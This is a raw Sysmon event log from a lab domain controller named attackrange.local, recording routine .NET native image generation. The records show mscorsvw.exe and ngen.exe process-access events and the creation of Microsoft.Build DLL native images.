13:49:55.713{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8c4-0\Microsoft.Build.Engine.dll2021-01-18 13:49:55.713 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:56.401{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.385{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:56.385{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:56.198{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.182{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:56.182{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:56.119{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\844-0\Microsoft.Build.Framework.dll2021-01-18 13:49:56.119 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.916{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.901{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.901{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.838{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.822{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.822{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.744{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.729{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.729{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:58.651{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4a0-0\Microsoft.Build.Utilities.v4.0.dll2021-01-18 13:49:58.651 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.260{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.260{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.197{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.182{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:58.182{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7103-00000000A301}4608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:58.041{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9c8-0\Microsoft.Build.Tasks.v4.0.dll2021-01-18 13:49:58.041 10341000x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.854{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 